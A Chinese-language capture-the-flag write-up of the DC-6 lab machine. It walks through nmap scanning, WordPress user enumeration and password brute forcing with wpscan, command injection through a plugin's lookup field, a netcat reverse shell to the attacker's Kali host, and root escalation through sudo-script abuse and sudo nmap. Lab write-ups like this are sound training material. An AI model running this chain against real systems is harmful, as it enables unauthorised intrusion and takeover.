DC-6靶机渗透测试 先对内网进行探活扫描nmap -sn 192.168.207.0/24dc-6的ip是192.168.207.136进行端口扫描nmap -sV -p- 192.168.207.136有两个端口22ssh80http先上浏览器访问http://192.168.207.136查看一下网站内容修改hosts文件nano /etc/hosts192.168.207.136 wordy重新访问http://wordy用的wordpress框架进行目录扫描dirsearch -u http://wordy找到了wp-login.php使用wpscan获取用户名wpscan --url http://wordy -e u有admin、mark、graham、sarah、jens五个账户等会可以考虑ssh接下来破解密码使用kali自带的rockyou.txt这个需要先解压cd /usr/share/wordlistsgzip -d rockyou.txt.gzmv rockyou.txt /home/kali因为rockyou太大了要大约尝试71721960次我后来查看靶机官网提示我们使用以下命令cat /usr/share/wordlists/rockyou.txt | grep k01 passwords.txtgrep k01 passwords.txt查找包含字符串 k01 的行重定向输出到文件等于是给我们缩小爆破范围但是实际爆破肯定是没有这个信息的或者需要我们自己去收集这个信息在/home/kali目录下进行密码破解wpscan --url http://wordy --passwords passwords.txt跑出mark / helpdesk01登录看看成功进入后台查看网页功能发现Activity monitor Tools里输入ip后点击lookup后有回显可以考虑rce远程命令注入想要输入其他命令发现不能输入有字数限制打开f12框选输入框将maxlength改为150就可以了写反弹shell到kali终端上nc -lvvp 6666nc 192.168.207.128 6666 -e /bin/bashpython -c import pty;pty.spawn(/bin/bash)切换到home目录查看mark目录有什么查看things-to-do.txtcat things-to-do.txt恢复超空间驱动器的全部功能需要与Jens沟通为Sarah的欢送会购买礼物新增用户graham - GSo7isUM1D4 - 已完成申请OSCP课程为Sarah的接替者购买新笔记本电脑这里可知graham / GSo7isUM1D4ssh graham192.168.207.136 -p 22查看当前用户可执行操作sudo -l可以操作backups.sh但是要切换到jens用户来执行echo /bin/bash /home/jens/backups.sh将/bin/bash追加写入到backups.sh中sudo -u jens /home/jens/backups.shsudo -u jens以jens用户身份来执行后面的命令sudo -lnmap可以以root身份执行搜索nmap提权TF$(mktemp)echo os.execute(/bin/sh) $TFsudo nmap --script$TFwhoamicat theflag.txt渗透测试成功